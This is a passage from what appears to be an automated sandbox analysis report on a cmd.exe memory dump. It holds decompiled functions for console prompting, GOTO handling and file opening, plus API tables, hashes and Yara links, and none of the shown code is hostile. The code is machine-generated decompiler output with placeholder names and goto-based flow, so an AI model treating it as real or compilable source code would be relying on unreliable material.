						_t105 =  &_v44;
						_t120 = 0x10;
						_t130 = L"NY" - _t105;
						while(1) {
							_t12 = _t120 + 0x7fffffee; // 0x7ffffffe
							if(_t12 == 0) {
								break;
							}
							_t93 =  *(_t130 + _t105) & 0x0000ffff;
							if(_t93 == 0) {
								break;
							}
							 *_t105 = _t93;
							_t105 =  &(_t105[0]);
							_t120 = _t120 - 1;
							if(_t120 != 0) {
								continue;
							}
							L16:
							_t105 = _t105 - 2;
							L17:
							_t128 = 0;
							 *_t105 = 0;
							L18:
							_t106 =  &_v44;
							_t121 = _t106 + 2;
							do {
								_t58 =  *_t106;
								_t106 = _t106 + 2;
							} while (_t58 != 0);
							_t108 = _t106 - _t121 >> 1;
							_v80 = (_t106 - _t121 >> 1) - 1;
							LocalFree(_t124);
							_t101 = GetStdHandle(0xfffffff5);
							_v88 = _t101;
							if(GetConsoleMode(_t101,  &_v60) != 0) {
								_t108 = _v60 | 0x00000001;
								_v45 = 1;
								SetConsoleMode(_t101, _v60 | 0x00000001);
							}
							_t125 = GetStdHandle(0xfffffff6);
							_v84 = _t125;
							if(GetConsoleMode(_t125,  &_v64) != 0) {
								_t108 = _v64 | 0x00000007;
								SetConsoleMode(_t125, _v64 | 0x00000007);
								_t134 =  *0x1e3888;
								if(_t134 != 0) {
									_t108 = _t134;
									 *0x1f94b4(L"<noalias>");
									 *_t134();
								}
								_t128 = 0;
							}
							_t126 = _v68;
							while(1) {
								_t100 = 1;
								_v52 = 0;
								_t68 = _v72;
								if(_v72 == 0) {
									_push(0);
									_push(_t126);
									_t69 = E001BC108(_t108);
									_t138 = _t137 + 8;
								} else {
									_t69 = E001BC108(_t108, _t126, 1, _t68);
									_t138 = _t137 + 0xc;
								}
								_t108 = 0;
								if(E001C0178(_t69) != 0) {
									FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
								}
								if(_v52 == 0xa) {
									goto L45;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t81 = GetStdHandle(0xfffffff6);
									_t121 =  &_v52;
									_t108 = _t81;
									if(E001D3B11(_t81,  &_v52, 1,  &_v76) == 0 || _v76 != 1) {
										break;
									}
									if(_t100 != 0) {
										_t128 = towupper(_v52) & 0x0000ffff;
										_t138 = _t138 + 4;
										_v56 = _t128;
									}
									_t108 = 0;
									_t100 = 0;
									if(E001C0178(_t82) == 0 || ( *0x1f3aa0 & 0x00000001) == 0) {
										_push(_v52 & 0x0000ffff);
										E001C25D9(L"%c");
										_t138 = _t138 + 8;
									}
									if(_v52 != 0xa) {
										continue;
									} else {
										goto L45;
									}
								}
								_t128 = _v44 & 0x0000ffff;
								_v56 = _t128;
								E001C25D9(L"\r\n");
								_t138 = _t138 + 4;
								L45:
								_t131 = wcschr( &_v44, _t128);
								_t137 = _t138 + 8;
								if(_t131 == 0) {
									L28:
									_t128 = _v56;
									continue;
								}
								_t133 = _t131 -  &_v44 >> 1;
								if(_t133 > _v80) {
									goto L28;
								}
								_t127 = _v84;
								if(_v45 != 0) {
									SetConsoleMode(_v88, _v60);
								}
								if(_t100 != 0) {
									SetConsoleMode(_t127, _v64);
									_t127 =  *0x1e3888;
									if(_t127 != 0) {
										 *0x1f94b4(L"CMD.EXE");
										 *_t127();
									}
								}
								_t74 = _t133;
								L53:
								return E001C6FD0(_t74, _t100, _v12 ^ _t135, _t121, _t127, _t133);
							}
						}
						if(_t120 != 0) {
							goto L17;
						}
						goto L16;
					}
					_t114 = _t124;
					_t8 = _t114 + 2; // 0x2
					_t122 = _t8;
					do {
						_t94 =  *_t114;
						_t114 = _t114 + 2;
					} while (_t94 != 0);
					if(_t114 - _t122 >> 1 >= 0x10) {
						goto L10;
					}
					E001C1040( &_v44, 0x10, _t124);
					__imp___wcsupr( &_v44);
					_t137 = _t137 + 4;
					goto L18;
				}
				_t136 = _t136 - 8;
				_t121 = 0;
				_t127 = E001B5DB5(__ecx, 0);
				if(_t127 == 0xffffffff) {
					goto L5;
				}
				_t98 = E001C0178(_t97);
				_t104 = _t127;
				_t133 = _t98;
				E001BDB92(_t127);
				if(_t98 == 0) {
					_t128 = 0;
					goto L5;
				}
				_t74 = 2;
				goto L53;
			}

0x001d9583
0x001d958b
0x001d9592
0x001d9596
0x001d959c
0x001d959e
0x001d95a1
0x001d95a4
0x001d95a7
0x001d95ab
0x001d95b6
0x001d95e9
0x001d95e9
0x001d95ef
0x001d95f1
0x001d95f6
0x001d9634
0x001d9634
0x001d963e
0x001d9643
0x001d9645
0x001d9645
0x001d964d
0x00000000
0x00000000
0x001d964f
0x001d9656
0x00000000
0x00000000
0x001d9658
0x001d965b
0x001d965e
0x001d9661
0x00000000
0x00000000
0x001d9669
0x001d9669
0x001d966c
0x001d966e
0x001d9670
0x001d9673
0x001d9673
0x001d9676
0x001d9679
0x001d9679
0x001d967c
0x001d967f
0x001d9686
0x001d968c
0x001d968f
0x001d969d
0x001d96a4
0x001d96af
0x001d96b4
0x001d96b7
0x001d96bd
0x001d96bd
0x001d96cb
0x001d96d2
0x001d96dd
0x001d96e4
0x001d96e9
0x001d96ef
0x001d96f7
0x001d96fe
0x001d9700
0x001d9706
0x001d9706
0x001d9708
0x001d9708
0x001d970f
0x001d9717
0x001d9719
0x001d971b
0x001d971f
0x001d9724
0x001d9734
0x001d9736
0x001d9737
0x001d973c
0x001d9726
0x001d972a
0x001d972f
0x001d972f
0x001d973f
0x001d9748
0x001d9753
0x001d9753
0x001d975e
0x00000000
0x00000000
0x00000000
0x00000000
0x001d9764
0x001d9764
0x001d976c
0x001d9772
0x001d9775
0x001d977e
0x00000000
0x00000000
0x001d9788
0x001d9793
0x001d9796
0x001d9799
0x001d9799
0x001d979c
0x001d979e
0x001d97a7
0x001d97b6
0x001d97bc
0x001d97c1
0x001d97c1
0x001d97c9
0x00000000
0x001d97cb
0x00000000
0x001d97cb
0x001d97c9
0x001d97cd
0x001d97d6
0x001d97d9
0x001d97de
0x001d97e1
0x001d97ec
0x001d97ee
0x001d97f3
0x001d9714
0x001d9714
0x00000000
0x001d9714
0x001d97fe
0x001d9803
0x00000000
0x00000000
0x001d980d
0x001d9810
0x001d9818
0x001d9818
0x001d9820
0x001d9826
0x001d982c
0x001d9834
0x001d983d
0x001d9843
0x001d9843
0x001d9834
0x001d9845
0x001d9847
0x001d9857
0x001d9857
0x001d9717
0x001d9667
0x00000000
0x00000000
0x00000000
0x001d9667
0x001d95f8
0x001d95fa
0x001d95fa
0x001d9603
0x001d9603
0x001d9606
0x001d9609
0x001d9615
0x00000000
0x00000000
0x001d9620
0x001d9629
0x001d962f
0x00000000
0x001d962f
0x001d95b8
0x001d95bb
0x001d95c2
0x001d95c7
0x00000000
0x00000000
0x001d95cb
0x001d95d0
0x001d95d2
0x001d95d4
0x001d95db
0x001d95e7
0x00000000
0x001d95e7
0x001d95dd
0x00000000

APIs

_wcsupr.MSVCRT ref: 001D9629
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 001D968F
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 001D9697
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001D96A7
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001D96BD
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 001D96C5
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001D96D5
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001D96E9
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 001D974C
FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 001D9753
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 001D976C
towupper.MSVCRT ref: 001D978D
wcschr.MSVCRT ref: 001D97E6
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 001D9818
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 001D9826

Part of subcall function 001C0178: _get_osfhandle.MSVCRT ref: 001C0183
Part of subcall function 001C0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001CD6A1), ref: 001C018D

Part of subcall function 001BDB92: _close.MSVCRT ref: 001BDBC1

Strings

CMD.EXE, xrefs: 001D9836
<noalias>, xrefs: 001D96F9

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
String ID: <noalias>$CMD.EXE
API String ID: 2015057810-1690691951
Opcode ID: fe5b6eaa9c2d7b9feafe46b04da076267069f15ba1edaa12b00b404aa3240bd6
Instruction ID: 43bb16d38ff15bdc3dc0d23e92c731b9e5e01d362b75377bd7b2b5265d11cf0e
Opcode Fuzzy Hash: fe5b6eaa9c2d7b9feafe46b04da076267069f15ba1edaa12b00b404aa3240bd6
Instruction Fuzzy Hash: 9A81C471E002149BCF14AFA4DC49BFEB7B9AF55710F19022AF812A7390EB749D85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001BE560 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E001BE560(struct HINSTANCE__** __ecx, struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v24;
				int _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				void* _v48;
				struct HINSTANCE__* _v552;
				struct HINSTANCE__* _v556;
				struct HINSTANCE__* _v560;
				struct HINSTANCE__* _v564;
				struct HINSTANCE__* _v568;
				intOrPtr _v572;
				void* _v576;
				void* _v580;
				void* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				struct HINSTANCE__* _t63;
				struct HINSTANCE__* _t67;
				struct HINSTANCE__* _t71;
				struct HINSTANCE__* _t72;
				struct HINSTANCE__ _t74;
				int _t77;
				int _t82;
				struct HINSTANCE__* _t84;
				struct HINSTANCE__* _t91;
				struct HINSTANCE__* _t92;
				void* _t93;
				struct HINSTANCE__* _t94;
				struct HINSTANCE__* _t95;
				struct HINSTANCE__* _t96;
				struct HINSTANCE__* _t108;
				struct HINSTANCE__** _t111;
				void* _t112;
				struct HINSTANCE__* _t118;
				struct HINSTANCE__ _t124;
				struct HINSTANCE__* _t143;
				void* _t144;
				struct HINSTANCE__* _t145;
				struct HINSTANCE__* _t147;
				void* _t148;
				struct HINSTANCE__* _t149;
				signed int _t150;
				signed int _t152;
				void* _t153;

				_t136 = __edx;
				_t152 = (_t150 & 0xfffffff8) - 0x234;
				_t60 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t60 ^ _t152;
				_t111 = __ecx;
				_v556 = __edx;
				_t147 = 0;
				_t143 = 1;
				_v564 = 0;
				_v560 = 1;
				_v552 = 0;
				if( *0x1f3cc4 != __ecx) {
					L79:
					_t63 = _t147;
					goto L33;
				} else {
					L2:
					while(1) {
						if( *0x1dd544 != 0) {
							E001D921A(_t111, _t143);
							_t136 = _v556;
						}
						 *0x1dd590 = 0;
						if( *0x1f3cc9 == 0 || _t143 == 0) {
							L5:
							_t145 = E001C0662(_t111);
							if(_t145 == 0xffffffff) {
								goto L74;
							}
							_t67 = E001BEEF0(3, _t145, _t111[4]);
							_t147 = _t67;
							__imp___tell(_t145);
							_t111[2] = _t67;
							_t153 = _t152 + 4;
							_t8 = _t145 - 3; // -3
							_t118 = 0;
							_t136 = _t145;
							if(_t8 > 0x5b) {
								L9:
								__imp___close(_t145);
								_t152 = _t153 + 4;
								if(_t147 == 0) {
									goto L42;
								}
								if(_t147 == 1 ||  *0x1ef980 == 0x234a) {
									E001D82EB(_t118);
									__eflags =  *0x1dd0c8 - 1;
									if( *0x1dd0c8 == 1) {
										__eflags =  *0x1f8530;
										if( *0x1f8530 == 0) {
											E001D6FF0(_t118);
											E001BC108(_t118, 0x2371, 1, 0x1e3892);
											_t152 = _t152 + 0xc;
										}
									}
									E001D9287(_t118);
									__imp__longjmp(0x1eb8b8, 1);
									goto L79;
								} else {
									if(_t147 == 0xffffffff) {
										_t63 = _v564;
										goto L33;
									} else {
										_t143 = _v560;
										_t136 = _v552;
										goto L14;
									}
								}
							}
							if(_t145 > 0x1f) {
								_t49 = _t145 - 0x20; // -32
								_t108 = 1 + (_t49 >> 5);
								__eflags = _t108;
								_t118 = _t108;
								do {
									_t136 = _t136 - 0x20;
									_t108 = _t108 - 1;
									__eflags = _t108;
								} while (_t108 != 0);
							}
							asm("btr eax, edx");
							goto L9;
						} else {
							__eflags =  *((short*)( *((intOrPtr*)(_t136 + 0x38)))) - 0x3a;
							if( *((short*)( *((intOrPtr*)(_t136 + 0x38)))) != 0x3a) {
								goto L5;
							}
							_t147 = E001C00B0(0x50);
							__eflags = _t147;
							if(_t147 == 0) {
								L74:
								_t63 = 1;
								L33:
								_pop(_t144);
								_pop(_t148);
								_pop(_t112);
								__eflags = _v8 ^ _t152;
								return E001C6FD0(_t63, _t112, _v8 ^ _t152, _t136, _t144, _t148);
							}
							_t147->i = 0;
							_t71 = E001BDF40(L"GOTO");
							 *(_t147 + 0x38) = _t71;
							__eflags = _t71;
							if(_t71 == 0) {
								goto L74;
							}
							_t72 = E001BDF40( *((intOrPtr*)(_v556 + 0x38)));
							 *(_t147 + 0x3c) = _t72;
							__eflags = _t72;
							if(_t72 == 0) {
								goto L74;
							}
							_t136 = 1;
							_t72->i = 0x20;
							 *(_t147 + 0x40) = 0;
							_v552 = 1;
							L14:
							if(_t143 != 0) {
								__eflags = _t147;
								if(_t147 != 0) {
									_v560 = 0;
								}
							}
							_t124 = _t147->i;
							if(_t124 != 0 ||  *( *(_t147 + 0x38)) != 0x3a) {
								if(_t136 != 0) {
									_v552 = 0;
									_t74 = _t124;
								} else {
									_t74 = _t124;
									if( *0x1dd0c8 == 1) {
										_t74 = _t124;
										__eflags = _t124 - 0x3b;
										if(_t124 != 0x3b) {
											__eflags =  *0x1f8530;
											_t74 = _t124;
											if( *0x1f8530 == 0) {
												E001D6FF0(_t124);
												_t136 = 0;
												E001D2ED0(_t147, 0);
												E001C25D9(L"\r\n");
												_t74 = _t147->i;
												_t152 = _t152 + 4;
											}
										}
									}
								}
								if(_t74 == 0x3b) {
									_t147 =  *(_t147 + 0x38);
								}
								_v28 = 0;
								_v24 = 1;
								 *(_t152 + 0x23c) = 0x104;
								memset(_t152 + 0x24, 0, 0x104);
								_t152 = _t152 + 0xc;
								if(_v24 == 0) {
									_t77 = 0x104;
								} else {
									_t77 = 0x7fe7;
								}
								if(E001C0C70(_t152 + 0x24, _t77) < 0) {
									E001C0DE8(_t78, _t152 + 0x20);
									goto L74;
								} else {
									if(_t147 == 0) {
										_t147 = 0;
										_v564 = 0;
										L29:
										__imp__??_V@YAXPAX@Z(_v28);
										_t152 = _t152 + 4;
										goto L30;
									}
									if( *_t147 != 0 || E001BDFC0(0x2a,  *(_t147 + 0x38),  &_v564) != 0xffffffff) {
										L26:
										_t136 = _t147;
										_v564 = E001C0E00(2, _t147);
										E001C06C0(2);
										_t82 = GetConsoleOutputCP();
										 *0x1e3854 = _t82;
										GetCPInfo(_t82, 0x1e3840);
										_t149 =  *0x1dd5f8; // 0x0
										if(_t149 == 0) {
											_t84 =  *0x1dd0d0; // 0xffffffff
											__eflags = _t84 - 0xffffffff;
											if(_t84 != 0xffffffff) {
												L68:
												__eflags = _t84;
												if(_t84 != 0) {
													_t149 = GetProcAddress(_t84, "SetThreadUILanguage");
													 *0x1dd5f8 = _t149;
												}
												L70:
												__eflags = _t149;
												if(_t149 != 0) {
													goto L27;
												}
												SetThreadLocale(0x409);
												L28:
												_t147 = _v568;
												goto L29;
											}
											_t84 = GetModuleHandleW(L"KERNEL32.DLL");
											_t149 =  *0x1dd5f8; // 0x0
											 *0x1dd0d0 = _t84;
											__eflags = _t84 - 0xffffffff;
											if(_t84 == 0xffffffff) {
												goto L70;
											}
											goto L68;
										}
										L27:
										 *0x1f94b4(0);
										_t149->i();
										goto L28;
									} else {
										_t91 = E001BD7D4( *(_t147 + 0x38), 0x2a);
										__eflags = _t91;
										if(_t91 != 0) {
											goto L26;
										}
										_t44 = _t91 + 0x3f; // 0x3f
										_t92 = E001BD7D4( *(_t147 + 0x38), _t44);
										__eflags = _t92;
										if(_t92 != 0) {
											goto L26;
										}
										_t141 = _v28;
										__eflags = _v28;
										if(__eflags == 0) {
											_t141 = _t152 + 0x20;
										}
										_t93 = E001C10B0(_t147, _t141, __eflags,  *((intOrPtr*)(_t152 + 0x230)));
										__eflags = _t93 - 2;
										if(_t93 != 2) {
											goto L26;
										} else {
											__eflags =  *(_t147 + 0x34);
											if( *(_t147 + 0x34) == 0) {
												L62:
												_t94 = _v28;
												__eflags = _t94;
												if(__eflags == 0) {
													_t94 = _t152 + 0x20;
												}
												_t136 =  *_t111;
												_push(_t94);
												_push(_t111[1]);
												_t95 = E001C1F52(_t111, _t147,  *_t111, _t143, _t147, __eflags);
												__eflags = _t95;
												if(_t95 != 0) {
													goto L72;
												} else {
													_t147 = 0;
													_v568 = 1;
													_v572 = 0;
													goto L29;
												}
											} else {
												_t136 = _t147;
												_t96 = E001D76C0(_v556, _t147);
												__eflags = _t96;
												if(_t96 != 0) {
													L72:
													__imp__??_V@YAXPAX@Z(_v36);
													_t152 = _t152 + 4;
													_t63 = 1;
													goto L33;
												}
												goto L62;
											}
										}
									}
								}
							} else {
								L42:
								_t147 = _v564;
								L30:
								if( *0x1f3cc4 != _t111) {
									goto L79;
								}
								_t143 = _v560;
								_t136 = _v556;
								continue;
							}
						}
					}
				}
			}

0x001be560
0x001be568
0x001be56e
0x001be575
0x001be57f
0x001be581
0x001be585
0x001be589
0x001be58e
0x001be592
0x001be596
0x001be5a0
0x001cc011
0x001cc011
0x00000000
0x001be5a6
0x00000000
0x001be5b0
0x001be5b7
0x001cbe97
0x001cbe9c
0x001cbe9c
0x001be5c4
0x001be5cb
0x001be5d5
0x001be5dc
0x001be5e1
0x00000000
0x00000000
0x001be5f1
0x001be5f7
0x001be5f9
0x001be5ff
0x001be602
0x001be605
0x001be608
0x001be60a
0x001be60f
0x001be62b
0x001be62c
0x001be632
0x001be637
0x00000000
0x00000000
0x001be640
0x001cbfcf
0x001cbfd4
0x001cbfdb
0x001cbfdd
0x001cbfe4
0x001cbfe6
0x001cbff7
0x001cbffc
0x001cbffc
0x001cbfe4
0x001cbfff
0x001cc00b
0x00000000
0x001be656
0x001be659
0x001be794
0x00000000
0x001be65f
0x001be65f
0x001be663
0x00000000
0x001be663
0x001be659
0x001be640
0x001be614
0x001cbea5
0x001cbeab
0x001cbeab
0x001cbeac
0x001cbeae
0x001cbeae
0x001cbeb1
0x001cbeb1
0x001cbeb1
0x001cbeb6
0x001be621
0x00000000
0x001be7ad
0x001be7b0
0x001be7b4
0x00000000
0x00000000
0x001be7c4
0x001be7c6
0x001be7c8
0x001cbfc5
0x001cbfc5
0x001be798
0x001be79f
0x001be7a0
0x001be7a1
0x001be7a2
0x001be7ac
0x001be7ac
0x001be7d3
0x001be7d9
0x001be7de
0x001be7e1
0x001be7e3
0x00000000
0x00000000
0x001be7f0
0x001be7f5
0x001be7f8
0x001be7fa
0x00000000
0x00000000
0x001be805
0x001be80a
0x001be80d
0x001be814
0x001be667
0x001be669
0x001be81d
0x001be81f
0x001be827
0x001be827
0x001be81f
0x001be66f
0x001be673
0x001be684
0x001be832
0x001be836
0x001be68a
0x001be691
0x001be693
0x001be89d
0x001be89f
0x001be8a2
0x001cbebb
0x001cbec2
0x001cbec4
0x001cbeca
0x001cbecf
0x001cbed3
0x001cbedd
0x001cbee2
0x001cbee4
0x001cbee4
0x001cbec4
0x001be8a2
0x001be693
0x001be69c
0x001be846
0x001be846
0x001be6ab
0x001be6b9
0x001be6c1
0x001be6cc
0x001be6d1
0x001be6dc
0x001cbeec
0x001be6e2
0x001be6e2
0x001be6e2
0x001be6f3
0x001cbfc0
0x00000000
0x001be6f9
0x001be6fb
0x001cbef6
0x001cbef8
0x001be76b
0x001be772
0x001be778
0x00000000
0x001be778
0x001be704
0x001be721
0x001be721
0x001be72d
0x001be731
0x001be736
0x001be742
0x001be747
0x001be74d
0x001be755
0x001cbf4d
0x001cbf52
0x001cbf55
0x001cbf72
0x001cbf72
0x001cbf74
0x001cbf82
0x001cbf84
0x001cbf84
0x001cbf8a
0x001cbf8a
0x001cbf8c
0x00000000
0x00000000
0x001cbf97
0x001be767
0x001be767
0x00000000
0x001be767
0x001cbf5c
0x001cbf62
0x001cbf68
0x001cbf6d
0x001cbf70
0x00000000
0x00000000
0x00000000
0x001cbf70
0x001be75b
0x001be75f
0x001be765
0x00000000
0x001be84e
0x001be856
0x001be85b
0x001be85d
0x00000000
0x00000000
0x001be866
0x001be869
0x001be86e
0x001be870
0x00000000
0x00000000
0x001be876
0x001be87d
0x001be87f
0x001be8ad
0x001be8ad
0x001be88a
0x001be88f
0x001be892
0x00000000
0x001be898
0x001cbf01
0x001cbf05
0x001cbf1a
0x001cbf1a
0x001cbf21
0x001cbf23
0x001cbf25
0x001cbf25
0x001cbf29
0x001cbf2d
0x001cbf2e
0x001cbf31
0x001cbf36
0x001cbf38
0x00000000
0x001cbf3a
0x001cbf3a
0x001cbf3c
0x001cbf44
0x00000000
0x001cbf44
0x001cbf07
0x001cbf0b
0x001cbf0d
0x001cbf12
0x001cbf14
0x001cbfa2
0x001cbfa9
0x001cbfaf
0x001cbfb2
0x00000000
0x001cbfb2
0x00000000
0x001cbf14
0x001cbf05
0x001be892
0x001be704
0x001be83d
0x001be83d
0x001be83d
0x001be77b
0x001be781
0x00000000
0x00000000
0x001be787
0x001be78b
0x00000000
0x001be78b
0x001be673
0x001be5cb
0x001be5b0

APIs

_tell.MSVCRT ref: 001BE5F9
_close.MSVCRT ref: 001BE62C
memset.MSVCRT ref: 001BE6CC
GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 001BE736
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,001E3840), ref: 001BE747
??_V@YAXPAX@Z.MSVCRT ref: 001BE772

Strings

KERNEL32.DLL, xrefs: 001CBF57
SetThreadUILanguage, xrefs: 001CBF76
GOTO, xrefs: 001BE7CE

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: ConsoleInfoOutput_close_tellmemset
String ID: GOTO$KERNEL32.DLL$SetThreadUILanguage
API String ID: 1380661413-3584302480
Opcode ID: 0ff7fd4d156e3dfc64a94f5da0f57de83a6385587d1500088da6cd6e539ec063
Instruction ID: 9997b0f63f5e2237a5e88c40b6127299f4a8cf3e3a43cd1200eec8c8a7561dfd
Opcode Fuzzy Hash: 0ff7fd4d156e3dfc64a94f5da0f57de83a6385587d1500088da6cd6e539ec063
Instruction Fuzzy Hash: DDB1BE70609301CBD724EF28D885BAAB7E1AFA4714F15092DF846D76A1EB70DC85CB92

Uniqueness

Uniqueness Score: -1.00%

Function 001BD120 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 177
fileCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E001BD120(long __ecx, signed int __edx) {
				void _v8;
				long _v12;
				long _v16;
				long _v20;
				signed int _v24;
				long _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				signed int _t34;
				long _t37;
				void* _t41;
				signed int _t44;
				signed int _t49;
				int _t54;
				signed char _t64;
				void* _t67;
				signed int _t71;
				long _t75;
				void* _t76;
				signed int _t78;
				signed int _t79;
				void* _t81;

				_t65 = __ecx;
				_t75 = 3;
				_v20 = __ecx;
				_t64 = __edx;
				_v16 = 3;
				_t71 = __edx & 0x00000003;
				_v40.bInheritHandle = 1;
				_v40.lpSecurityDescriptor = 0;
				_v40.nLength = 0xc;
				if(_t71 > 2) {
					L2:
					return _t34 | 0xffffffff;
				}
				_t34 = __edx & 0x00000009;
				if(_t34 != 9) {
					if(_t71 != 0) {
						_t78 = 0x40000000;
						__imp___wcsicmp(__ecx, L"con");
						_t81 = _t81 + 8;
						if(_t34 != 0) {
							_t75 = 1;
							_v16 = 1;
						}
						_t65 = _v20;
						_t37 = 2;
					} else {
						_t78 = 0x80000000;
						_t37 = 3;
					}
					_push(0);
					_push(0x80);
					if(_t64 == 0x10a) {
						_t41 = CreateFileW(_t65, _t78 | 0x80000000, _t75,  &_v40, 3, ??, ??);
						_t76 = _t41;
						if(_t76 != 0xffffffff) {
							goto L9;
						}
						_push(0);
						_push(0x80);
						_push(4);
						_push( &_v40);
						_push(_v16);
						_push(_t78);
						_push(_v20);
						goto L8;
					} else {
						_push(_t37);
						_push( &_v40);
						_push(_t75);
						_push(_t78);
						_push(_t65);
						L8:
						_t41 = CreateFileW();
						_t76 = _t41;
						if(_t76 == 0xffffffff) {
							_t54 = GetLastError();
							 *0x1f3cf0 = _t54;
							if(_t54 == 0x6e) {
								 *0x1f3cf0 = 2;
							}
							L28:
							_t44 = _t54 | 0xffffffff;
							L14:
							return _t44;
						}
						L9:
						__imp___open_osfhandle(_t76, 8);
						_t79 = _t41;
						if((_t64 & 0x00000008) != 0) {
							if(E001C0178(_t41) != 0) {
								goto L10;
							}
							_t49 = GetFileSize(_t76,  &_v20);
							_v24 = _t49;
							if((_t49 | _v20) == 0) {
								goto L10;
							}
							_v12 = 0xffffffff;
							_v8 = 0;
							if(SetFilePointer(_t76, 0xffffffff,  &_v12, 2) == 0xffffffff) {
								_t54 = GetLastError();
								 *0x1f3cf0 = _t54;
								if(_t54 == 0) {
									goto L23;
								}
								if(_t79 == 0xffffffff) {
									_t54 = CloseHandle(_t76);
								} else {
									__imp___close(_t79);
								}
								goto L28;
							}
							L23:
							if(ReadFile(_t76,  &_v8, 1,  &_v28, 0) == 0) {
								_v12 = 0;
								SetFilePointer(_t76, 0,  &_v12, 2);
							}
							if(_v8 == 0x1a) {
								_v12 = 0xffffffff;
								SetFilePointer(_t76, 0xffffffff,  &_v12, 2);
							}
						}
						L10:
						_t9 = _t79 - 3; // -3
						_t67 = 0;
						if(_t9 <= 0x5b) {
							if(_t79 > 0x1f) {
								_t33 = _t79 - 0x20; // -32
								_t67 = (_t33 >> 5) + 1;
							}
							asm("bts eax, edx");
						}
						_t44 = _t79;
						goto L14;
					}
				}
				goto L2;
			}

0x001bd120
0x001bd12a
0x001bd12f
0x001bd132
0x001bd134
0x001bd137
0x001bd139
0x001bd140
0x001bd147
0x001bd151
0x001bd15c
0x00000000
0x001bd15c
0x001bd155
0x001bd15a
0x001bd16a
0x001bd1ea
0x001bd1ef
0x001bd1f5
0x001bd1fa
0x001bd1fc
0x001bd201
0x001bd201
0x001bd204
0x001bd207
0x001bd16c
0x001bd16c
0x001bd171
0x001bd171
0x001bd173
0x001bd175
0x001bd180
0x001bd221
0x001bd227
0x001bd22c
0x00000000
0x00000000
0x001bd232
0x001bd234
0x001bd239
0x001bd23e
0x001bd23f
0x001bd242
0x001bd243
0x00000000
0x001bd186
0x001bd186
0x001bd18a
0x001bd18b
0x001bd18c
0x001bd18d
0x001bd18e
0x001bd18e
0x001bd194
0x001bd199
0x001cb555
0x001cb55b
0x001cb563
0x001cb565
0x001cb565
0x001cb56f
0x001cb56f
0x001bd1de
0x00000000
0x001bd1de
0x001bd19f
0x001bd1a2
0x001bd1ab
0x001bd1b0
0x001bd254
0x00000000
0x00000000
0x001bd25f
0x001bd265
0x001bd26b
0x00000000
0x00000000
0x001bd273
0x001bd27c
0x001bd290
0x001cb577
0x001cb57d
0x001cb584
0x00000000
0x00000000
0x001cb58d
0x001cb59c
0x001cb58f
0x001cb590
0x001cb596
0x00000000
0x001cb58d
0x001bd296
0x001bd2ab
0x001cb5a9
0x001cb5b4
0x001cb5b4
0x001bd2b6
0x001cb5c4
0x001cb5cf
0x001cb5cf
0x001bd2b6
0x001bd1b6
0x001bd1b6
0x001bd1b9
0x001bd1c0
0x001bd1c5
0x001cb5da
0x001cb5e2
0x001cb5e8
0x001bd1d2
0x001bd1d5
0x001bd1dc
0x00000000
0x001bd1dc
0x001bd180
0x00000000

APIs

CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,?,0000000C,00000004,00000080,00000000), ref: 001BD18E
_open_osfhandle.MSVCRT ref: 001BD1A2
_wcsicmp.MSVCRT ref: 001BD1EF
CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,001DF830,00002000), ref: 001BD221
GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 001BD25F
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 001BD287
